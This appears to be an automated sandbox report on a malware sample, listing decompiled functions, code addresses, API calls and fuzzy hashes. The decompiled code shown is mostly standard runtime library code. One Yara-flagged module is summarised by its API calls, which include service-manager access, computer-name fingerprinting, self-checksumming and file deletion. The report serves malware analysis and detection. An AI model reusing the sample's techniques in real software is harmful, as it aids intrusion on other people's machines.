                                                                              0x004215b4
                                                                              0x004215b7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004215bd
                                                                              0x004215c0
                                                                              0x004215c1
                                                                              0x004215c6
                                                                              0x004215c9
                                                                              0x004215cd
                                                                              0x004215d7
                                                                              0x004215dd
                                                                              0x004215e2
                                                                              0x00000000
                                                                              0x004215e2
                                                                              0x004215cf
                                                                              0x004215cf
                                                                              0x00000000
                                                                              0x004215cf
                                                                              0x00421556
                                                                              0x0042155a
                                                                              0x0042155d
                                                                              0x0042155f
                                                                              0x0042155f
                                                                              0x00421565
                                                                              0x00421565
                                                                              0x00421567
                                                                              0x00421588
                                                                              0x00421588
                                                                              0x0042158b
                                                                              0x0042158e
                                                                              0x00421592
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421594
                                                                              0x00421596
                                                                              0x004215a2
                                                                              0x004215a2
                                                                              0x00000000
                                                                              0x00421569
                                                                              0x00421569
                                                                              0x0042156d
                                                                              0x00421570
                                                                              0x00421572
                                                                              0x00421572
                                                                              0x00421575
                                                                              0x00421578
                                                                              0x00421579
                                                                              0x0042157b
                                                                              0x0042157c
                                                                              0x00421581
                                                                              0x00421584
                                                                              0x00421586
                                                                              0x004215d4
                                                                              0x004215d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421586
                                                                              0x00421567
                                                                              0x004215ec
                                                                              0x00000000
                                                                              0x004215ec
                                                                              0x004214da
                                                                              0x004214de
                                                                              0x004214df
                                                                              0x004214e4
                                                                              0x004214e9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004214ef
                                                                              0x004214ef
                                                                              0x00000000
                                                                              0x004214ef
                                                                              0x004214af
                                                                              0x004214b4
                                                                              0x004214b6
                                                                              0x004214b8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004214ba
                                                                              0x004214bc
                                                                              0x004214bf
                                                                              0x004214c4
                                                                              0x004214c6
                                                                              0x00000000
                                                                              0x004214c6
                                                                              0x0042149c
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: af64898f88f398f14b1ed2bb53a95b2f4c0c3f60e479224aab502ef89ca70ca9
                                                                              • Instruction ID: 97f1c94b0c9fadaae7ce148d88db5b0c1e12abbb407536b6122b4692d7e317a6
                                                                              • Opcode Fuzzy Hash: af64898f88f398f14b1ed2bb53a95b2f4c0c3f60e479224aab502ef89ca70ca9
                                                                              • Instruction Fuzzy Hash: 8351CA71B00114AFCB10DBA9D9809EEB7F4EF69314F94466BE112E32A0DB74E984CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E088, Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E0042E088(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E004128A0(E00430F7D, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x45a0d4; // 0x45a0d8
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x45a0d8;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E0042DDD3(0x45a0d8);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x45a0d4 = _t15; // executed
					}
					_t14 = E0042DB8C(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x45a0d4; // 0x45a0d8
				_t23 = E0042DC98(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x45a0d4; // 0x45a0d8
					_t23 = _t12;
					E0042DE78(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                              0x0042e08d
                                                                              0x0042e092
                                                                              0x0042e094
                                                                              0x0042e09a
                                                                              0x0042e09c
                                                                              0x0042e0a4
                                                                              0x0042e0ab
                                                                              0x0042e0ae
                                                                              0x0042e0b2
                                                                              0x0042e0b7
                                                                              0x0042e0bb
                                                                              0x0042e0bd
                                                                              0x0042e0bd
                                                                              0x0042e0c3
                                                                              0x0042e0c8
                                                                              0x0042e0c8
                                                                              0x0042e0cc
                                                                              0x0042e0d7
                                                                              0x0042e0db
                                                                              0x0042e0dd
                                                                              0x0042e0e0
                                                                              0x0042e0e6
                                                                              0x0042e0eb
                                                                              0x0042e0eb
                                                                              0x0042e0f7
                                                                              0x0042e0ff

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042E08D
                                                                                • Part of subcall function 0042DDD3: TlsAlloc.KERNEL32(?,0042E0B7,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0,00000000,?,00412EE2,00000000), ref: 0042DDF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocH_prolog
                                                                              • String ID:
                                                                              • API String ID: 3910492588-0
                                                                              • Opcode ID: b45dd2ead7d7e50ef2884d92576724ad332ed22d1080846af9fe7be61cebfab0
                                                                              • Instruction ID: 453f17a88eadcff191bb547c3fd0757b733a3289fb9cbaeafe14a1a449ff7bfd
                                                                              • Opcode Fuzzy Hash: b45dd2ead7d7e50ef2884d92576724ad332ed22d1080846af9fe7be61cebfab0
                                                                              • Instruction Fuzzy Hash: 2501A232710220ABCB249F16D81177D77B1EF94716F50463EE58297391DBBD8C11DB19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403BC6, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00403BC6(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t8;
				void* _t9;

				_t8 = __ecx;
				_t4 = E004020B1(_t8, _t9, _a4, E00411A30(_a4)); // executed
				return _t4;
			}






                                                                              0x00403bcb
                                                                              0x00403bda
                                                                              0x00403be0

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              • Opcode ID: 4607d5ae61d85e3c09a5cc5ba899dd2d3ef5bdc27ccf119b7b8a4d0e1504fd09
                                                                              • Instruction ID: db15178483983a70e089acf957d6c13790fe35df87173019290b46afbe551840
                                                                              • Opcode Fuzzy Hash: 4607d5ae61d85e3c09a5cc5ba899dd2d3ef5bdc27ccf119b7b8a4d0e1504fd09
                                                                              • Instruction Fuzzy Hash: 0FC08C320042202A8526321199058AFAE05CF802B0B00881FBD48012A089798CD1809A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DBAC, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,02234128,0222DC38,0222E2E4,00000102,0222BC8F,?,0222BD08), ref: 0222DBB8
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FolderPath
                                                                              • String ID:
                                                                              • API String ID: 1514166925-0
                                                                              • Opcode ID: 874bee1369989a3ff1fd971a6207c1a5a2419c8b76dd53b13bb88f8ce4ea0b75
                                                                              • Instruction ID: 295320fa78a855c60a41b772b6e350927379752276d22fa1e59f8dd4675ca3ec
                                                                              • Opcode Fuzzy Hash: 874bee1369989a3ff1fd971a6207c1a5a2419c8b76dd53b13bb88f8ce4ea0b75
                                                                              • Instruction Fuzzy Hash: 20B011E0AA0200BEFE002AB02C0EF33228CC300A02F000E80BC02E0080C0E08C008820
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222E2C5, Relevance: 1.3, APIs: 1, Instructions: 34stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0222DB03: OpenSCManagerW.SECHOST(00000000,00000000,000F003F,0222E2D5,00000102,0222BC8F,?,0222BD08), ref: 0222DB0C
                                                                                • Part of subcall function 0222DB03: CloseServiceHandle.ADVAPI32(00000000,?,0222BD08), ref: 0222DB21
                                                                                • Part of subcall function 0222DAE1: GetModuleFileNameW.KERNEL32(00000000,02234330,00000104,?,00000102,0222E2DA,00000102,0222BC8F,?,0222BD08), ref: 0222DAFA
                                                                                • Part of subcall function 0222DD5D: CreateFileW.KERNELBASE(02234330,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD72
                                                                                • Part of subcall function 0222DD5D: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD87
                                                                                • Part of subcall function 0222DD5D: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD99
                                                                                • Part of subcall function 0222DD5D: GetFileSize.KERNEL32(00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDA8
                                                                                • Part of subcall function 0222DD5D: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0222DDB2
                                                                                • Part of subcall function 0222DD5D: UnmapViewOfFile.KERNEL32(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDBE
                                                                                • Part of subcall function 0222DD5D: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDC5
                                                                                • Part of subcall function 0222DD5D: CloseHandle.KERNEL32(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDCC
                                                                                • Part of subcall function 0222DDD6: GetComputerNameW.KERNEL32(?,?), ref: 0222DDEC
                                                                                • Part of subcall function 0222DDD6: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0222DE19
                                                                                • Part of subcall function 0222DDD6: _snprintf.NTDLL ref: 0222DE87
                                                                                • Part of subcall function 0222DC86: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?,?,00000102), ref: 0222DCD4
                                                                                • Part of subcall function 0222DC86: _snwprintf.NTDLL ref: 0222DD39
                                                                                • Part of subcall function 0222DC86: DeleteFileW.KERNELBASE(?), ref: 0222DD50
                                                                              • lstrcmpiW.KERNEL32(02234330,02233F20,00000102,0222BC8F,?,0222BD08), ref: 0222E2FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Close$CreateHandleNameView$ByteChangeCharComputeComputerCrc32DeleteFindFolderManagerMappingModuleMultiNotificationOpenPathServiceSizeUnmapWide_snprintf_snwprintflstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 2602264906-0
                                                                              • Opcode ID: bde485cb6fa6e4c209be322876c5900d2964e0fa60f0236a6b5ea3fe5fd776e9
                                                                              • Instruction ID: 6b4f9000a0f9426765249c5f870cce56748e5dcdc87581f008760921459853e9
                                                                              • Opcode Fuzzy Hash: bde485cb6fa6e4c209be322876c5900d2964e0fa60f0236a6b5ea3fe5fd776e9
                                                                              • Instruction Fuzzy Hash: 75F0A072AB8331BBEA08BBF57908B5E23879F01712B014465E000C915CEEA2585C8DA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 004290C4, Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004290C4(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E004128A0(E00430FA4, _t76);
				_t33 =  *0x457184; // 0xc72e1596
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E00428A50();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E00429082(_t76, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E00401000( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E00412FBB(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                              0x004290c9
                                                                              0x004290d4
                                                                              0x004290dc
                                                                              0x004290df
                                                                              0x004290f3
                                                                              0x004290fd
                                                                              0x0042910e
                                                                              0x00429117
                                                                              0x0042911c
                                                                              0x00429126
                                                                              0x0042912e
                                                                              0x00429131
                                                                              0x00429141
                                                                              0x004291dc
                                                                              0x004291de
                                                                              0x00429147
                                                                              0x00429165
                                                                              0x00429172
                                                                              0x00429175
                                                                              0x00429175
                                                                              0x00429182
                                                                              0x00000000
                                                                              0x00429184
                                                                              0x0042918e
                                                                              0x00429197
                                                                              0x00000000
                                                                              0x00429199
                                                                              0x0042919a
                                                                              0x004291a6
                                                                              0x00000000
                                                                              0x004291c9
                                                                              0x004291d6
                                                                              0x00000000
                                                                              0x004291d6
                                                                              0x004291a6
                                                                              0x00429197
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429165
                                                                              0x004291e5
                                                                              0x004291ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004290ff
                                                                              0x00429104
                                                                              0x00429110
                                                                              0x00429110
                                                                              0x00429110
                                                                              0x004291f1
                                                                              0x00429202

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004290C9
                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 004290F3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00429104
                                                                                • Part of subcall function 00429082: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004290A7
                                                                                • Part of subcall function 00429082: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 004290AE
                                                                              • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00429139
                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 0042915D
                                                                              • CharUpperA.USER32(?,?,?,?), ref: 00429175
                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 0042918E
                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0042919A
                                                                              • lstrlenA.KERNEL32(?,?,?,?), ref: 004291B7
                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 004291D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                              • String ID:
                                                                              • API String ID: 4080879615-0
                                                                              • Opcode ID: 8fb7b7f9e86ea6e332f039f5fd3a7c646a8988f1a612b003eeb02b703282e1fe
                                                                              • Instruction ID: a026a971bacd424190f1abe37174b9483bebdb546824d758e64a9196714d402d
                                                                              • Opcode Fuzzy Hash: 8fb7b7f9e86ea6e332f039f5fd3a7c646a8988f1a612b003eeb02b703282e1fe
                                                                              • Instruction Fuzzy Hash: EE31AE31A00129EFDB109F65ED88AEF7BBCEF44355F4041AAF909D6211C7788E908A58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02222F82, Relevance: 12.4, APIs: 8, Instructions: 416COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$memset$memcpy
                                                                              • String ID:
                                                                              • API String ID: 1551266493-0
                                                                              • Opcode ID: 919cb0091612759cd0de7281b773fed8df28054952edb0c76b54b9cb0d49033b
                                                                              • Instruction ID: b9d8e7ca3d8d588498ea4a7e5cfee78051667b140458e2cc21731fe2ea25f23c
                                                                              • Opcode Fuzzy Hash: 919cb0091612759cd0de7281b773fed8df28054952edb0c76b54b9cb0d49033b
                                                                              • Instruction Fuzzy Hash: 7C02593091067AFFCB1ACFA8C9846EABB75FF44304F1401A9C85587645D73BBA69CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C4D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E0041C4D8(void* __edx, intOrPtr* _a4, signed short _a8, signed short _a12) {
				void* __esi;
				signed short _t11;
				int _t13;
				int _t14;
				signed short _t15;
				signed short _t17;
				signed short _t19;
				signed short _t23;
				void* _t26;
				signed short _t27;
				int _t35;
				intOrPtr* _t38;
				void* _t39;
				short _t40;
				signed short _t42;
				intOrPtr* _t44;
				signed short _t45;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t58;
				intOrPtr _t62;

				_t39 = __edx;
				_t49 =  *0x45a860; // 0x0
				if(_t49 == 0) {
					if( *0x45a3f0 != 2) {
						 *0x45a860 = E0041BEA7;
					} else {
						 *0x45a860 = GetLocaleInfoA;
					}
				}
				_t44 = _a4;
				if(_t44 == 0) {
					L23:
					E0041BDF9();
					goto L24;
				} else {
					_t23 = _t44 + 0x40;
					_t38 = _t44;
					 *0x45a85c = _t38;
					 *0x45a854 = _t23;
					if(_t23 != 0 &&  *_t23 != 0) {
						E0041BD99(_t38, _t39, 0x44d3e0, 0x16, 0x45a854);
						_t38 =  *0x45a85c; // 0x0
						_t23 =  *0x45a854; // 0x0
						_t47 = _t47 + 0xc;
					}
					 *0x45a840 = 0;
					if(_t38 == 0 ||  *_t38 == 0) {
						__eflags = _t23;
						if(_t23 == 0) {
							goto L23;
						}
						__eflags =  *_t23;
						if(__eflags == 0) {
							goto L23;
						}
						E0041C3C6(__eflags);
						goto L24;
					} else {
						if(_t23 == 0) {
							L13:
							E0041C483(__eflags);
							L14:
							_t58 =  *0x45a840; // 0x0
							if(_t58 != 0) {
								L26:
								_t42 = E0041BE13(_t44 + 0x80, _t44);
								__eflags = _t42;
								if(_t42 == 0) {
									L38:
									_t11 = 0;
									__eflags = 0;
									L39:
									return _t11;
								}
								_t13 = IsValidCodePage(_t42 & 0x0000ffff);
								__eflags = _t13;
								if(_t13 == 0) {
									goto L38;
								}
								_t14 = IsValidLocale( *0x45a844, 1);
								__eflags = _t14;
								if(_t14 == 0) {
									goto L38;
								}
								_t15 = _a8;
								__eflags = _t15;
								_t35 =  *0x45a844; // 0x0
								if(_t15 != 0) {
									_t40 =  *0x45a848; // 0x0
									 *_t15 = _t35;
									 *((short*)(_t15 + 2)) = _t40;
									 *(_t15 + 4) = _t42;
								}
								_t45 = _a12;
								__eflags = _t45;
								if(_t45 == 0) {
									L37:
									_t11 = 1;
									goto L39;
								} else {
									__eflags =  *_t15 - 0x814;
									if( *_t15 != 0x814) {
										_t17 =  *0x45a860(_t35, 0x1001, _t45, 0x40);
										__eflags = _t17;
										if(_t17 == 0) {
											goto L38;
										}
										L35:
										_t19 =  *0x45a860( *0x45a848, 0x1002, _t45 + 0x40, 0x40);
										__eflags = _t19;
										if(_t19 == 0) {
											goto L38;
										}
										_t46 = _t45 + 0x80;
										__eflags = _t45 + 0x80;
										E00413F9B(_t42, _t46, 0xa);
										goto L37;
									}
									E00419460(_t45, "Norwegian-Nynorsk");
									goto L35;
								}
							}
							_t26 = E0041BD99(_t38, _t39, 0x44d590, 0x40, 0x45a85c);
							_t47 = _t47 + 0xc;
							if(_t26 == 0) {
								L24:
								_t62 =  *0x45a840; // 0x0
								if(_t62 != 0) {
									goto L26;
								}
								return 0;
							}
							_t27 =  *0x45a854; // 0x0
							if(_t27 == 0) {
								L19:
								E0041C483(__eflags);
								goto L24;
							}
							_t61 =  *_t27;
							if( *_t27 == 0) {
								goto L19;
							}
							E0041C3FD(_t61);
							goto L24;
						}
						_t57 =  *_t23;
						if( *_t23 == 0) {
							goto L13;
						}
						E0041C3FD(_t57);
						goto L14;
					}
				}
			}
























                                                                              0x0041c4d8
                                                                              0x0041c4db
                                                                              0x0041c4e2
                                                                              0x0041c4eb
                                                                              0x0041c4f9
                                                                              0x0041c4ed
                                                                              0x0041c4f2
                                                                              0x0041c4f2
                                                                              0x0041c4eb
                                                                              0x0041c503
                                                                              0x0041c509
                                                                              0x0041c5b2
                                                                              0x0041c5b2
                                                                              0x00000000
                                                                              0x0041c50f
                                                                              0x0041c50f
                                                                              0x0041c514
                                                                              0x0041c516
                                                                              0x0041c51c
                                                                              0x0041c521
                                                                              0x0041c533
                                                                              0x0041c538
                                                                              0x0041c53e
                                                                              0x0041c543
                                                                              0x0041c543
                                                                              0x0041c548
                                                                              0x0041c54e
                                                                              0x0041c5a3
                                                                              0x0041c5a5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5a7
                                                                              0x0041c5a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5ab
                                                                              0x00000000
                                                                              0x0041c554
                                                                              0x0041c556
                                                                              0x0041c563
                                                                              0x0041c563
                                                                              0x0041c568
                                                                              0x0041c568
                                                                              0x0041c56e
                                                                              0x0041c5c6
                                                                              0x0041c5d2
                                                                              0x0041c5d4
                                                                              0x0041c5d6
                                                                              0x0041c687
                                                                              0x0041c687
                                                                              0x0041c687
                                                                              0x0041c689
                                                                              0x00000000
                                                                              0x0041c689
                                                                              0x0041c5e0
                                                                              0x0041c5e6
                                                                              0x0041c5e8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5f6
                                                                              0x0041c5fc
                                                                              0x0041c5fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c604
                                                                              0x0041c608
                                                                              0x0041c60a
                                                                              0x0041c610
                                                                              0x0041c612
                                                                              0x0041c619
                                                                              0x0041c61c
                                                                              0x0041c620
                                                                              0x0041c620
                                                                              0x0041c624
                                                                              0x0041c628
                                                                              0x0041c62a
                                                                              0x0041c682
                                                                              0x0041c684
                                                                              0x00000000
                                                                              0x0041c62c
                                                                              0x0041c62c
                                                                              0x0041c631
                                                                              0x0041c64b
                                                                              0x0041c651
                                                                              0x0041c653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c655
                                                                              0x0041c666
                                                                              0x0041c66c
                                                                              0x0041c66e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c672
                                                                              0x0041c672
                                                                              0x0041c67a
                                                                              0x00000000
                                                                              0x0041c67f
                                                                              0x0041c639
                                                                              0x00000000
                                                                              0x0041c63f
                                                                              0x0041c62a
                                                                              0x0041c57c
                                                                              0x0041c581
                                                                              0x0041c586
                                                                              0x0041c5b7
                                                                              0x0041c5b7
                                                                              0x0041c5bd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5bf
                                                                              0x0041c588
                                                                              0x0041c58f
                                                                              0x0041c59c
                                                                              0x0041c59c
                                                                              0x00000000
                                                                              0x0041c59c
                                                                              0x0041c591
                                                                              0x0041c593
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c595
                                                                              0x00000000
                                                                              0x0041c595
                                                                              0x0041c558
                                                                              0x0041c55a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c55c
                                                                              0x00000000
                                                                              0x0041c55c
                                                                              0x0041c54e

                                                                              APIs
                                                                              • _TranslateName.LIBCMT ref: 0041C533
                                                                              • _TranslateName.LIBCMT ref: 0041C57C
                                                                              • IsValidCodePage.KERNEL32(00000000,00000082,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C5E0
                                                                              • IsValidLocale.KERNEL32(00000001), ref: 0041C5F6
                                                                              • _strcat.LIBCMT ref: 0041C639
                                                                                • Part of subcall function 0041C3C6: _strlen.LIBCMT ref: 0041C3CC
                                                                                • Part of subcall function 0041C3C6: EnumSystemLocalesA.KERNEL32(0041BFDC,00000001,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C3E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
